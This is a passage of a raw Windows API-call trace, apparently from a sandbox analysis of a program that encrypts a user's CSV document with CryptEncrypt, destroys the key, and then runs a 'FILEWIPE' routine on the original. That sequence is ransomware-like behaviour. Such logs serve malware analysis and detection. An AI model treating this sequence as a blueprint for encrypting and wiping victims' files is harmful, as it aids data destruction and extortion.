hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0179.709] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.709] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0179.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.709] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.709] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.710] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0179.710] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.710] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.710] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.710] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.712] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.712] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xb478, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xb480) returned 1 [0179.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.712] CharLowerBuffW (in: lpsz="byte[46209]", cchLength=0xb | out: lpsz="byte[46209]") returned 0xb [0179.712] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.715] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.715] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.715] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0179.715] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.715] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb478, dwBufLen=0xb480 | out: pbData=0xa5f008*, pdwDataLen=0x87e820*=0xb480) returned 1 [0179.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.716] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.718] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.718] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.718] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.718] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.718] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0179.718] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.719] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.719] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0179.719] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.720] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0179.720] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.726] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.733] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.733] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0179.733] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.733] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.733] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0179.733] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.733] CryptDestroyKey (hKey=0x90af98) returned 1 [0179.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.734] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.734] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.734] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.734] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0179.734] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.735] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0179.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0179.735] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.735] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0179.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.735] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0179.735] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0179.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.735] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.735] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0179.735] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.735] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0179.735] CryptReleaseContext (hProv=0x9c0b78, dwFlags=0x0) returned 1 [0179.735] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.735] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0179.735] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0179.736] FreeLibrary (hLibModule=0x74f20000) returned 1 [0179.736] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.736] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.736] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.737] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.741] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.741] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0179.741] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.741] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.741] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\RDv9Bzzuy Is9HIraE.csv", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x658e8210, ftCreationTime.dwHighDateTime=0x1d5e481, ftLastAccessTime.dwLowDateTime=0x5efc4c10, ftLastAccessTime.dwHighDateTime=0x1d5dba4, ftLastWriteTime.dwLowDateTime=0x5efc4c10, ftLastWriteTime.dwHighDateTime=0x1d5dba4, nFileSizeHigh=0x0, nFileSizeLow=0xb478, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RDv9Bzzuy Is9HIraE.csv", cAlternateFileName="RDV9BZ~1.CSV")) returned 0x90ae18 [0179.742] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0179.742] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.742] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0179.743] CharLowerBuffW (in: lpsz="byte[46200]", cchLength=0xb | out: lpsz="byte[46200]") returned 0xb [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc168 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0179.743] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.744] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.744] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.745] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0179.745] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.745] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0179.745] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0179.745] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0179.745] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2658 [0179.746] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2658, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0179.746] FreeLibrary (hLibModule=0x75c90000) returned 1 [0179.746] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0179.746] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0179.746] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.746] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0179.746] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0179.746] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0179.747] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0179.747] RtlAllocateHeap 